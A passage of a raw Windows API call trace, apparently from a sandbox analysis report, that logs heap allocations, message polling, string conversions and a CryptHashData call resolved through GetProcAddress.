Flags=0x0, Size=0x8) returned 0x2e55088 [0222.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0222.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0222.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0222.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0222.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0222.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0222.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0222.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0222.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0222.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0222.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0222.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0222.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0222.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0222.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0222.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0222.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0222.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0222.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0222.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0222.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0222.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0222.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55098 [0222.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0222.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0222.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0222.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550b8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0222.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0222.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0222.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0222.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0222.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0222.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0222.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0222.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0222.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0222.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0222.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0222.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0222.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0222.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0222.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0222.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0222.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0222.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0222.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0222.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0222.964] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0222.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0222.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0222.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0222.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0222.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0222.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0222.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0222.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0222.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0222.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0222.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0222.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0222.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55088 [0222.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0222.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0222.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0222.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0222.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0222.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0222.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0222.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0222.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0222.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0222.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0222.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0222.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0222.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0222.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0222.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0222.965] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0222.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0222.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0222.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0222.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0222.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0222.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0222.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0222.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0222.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0222.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0222.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f88 [0222.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0222.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0222.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0222.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0222.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0222.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0222.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0222.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550a8 [0222.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0222.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0222.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0222.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0222.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0222.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0222.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0222.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0222.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.967] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0222.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0222.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0222.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0222.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0222.967] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0222.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0222.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0222.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0222.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0222.967] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0222.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0222.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0222.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0222.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0222.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0222.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0222.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0222.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0222.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0222.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0222.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0222.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0222.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0222.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0222.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0222.968] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0222.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51520, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0222.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0222.969] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0222.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0222.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.969] CryptHashData (hHash=0xa87310, pbData=0x2e55088, dwDataLen=0x3, dwFlags=0x1) returned 1 [0222.969] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.969] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0222.969] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.969] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0222.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0222.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0222.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0222.969] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0222.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0222.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0222.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0222.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0222.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0222.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0222.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0222.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0222.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0222.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0222.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0222.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0222.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0222.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0222.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0222.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0222.970] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0222.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0222.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0222.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0222.971] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0222.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0222.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0222.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0222.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0222.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 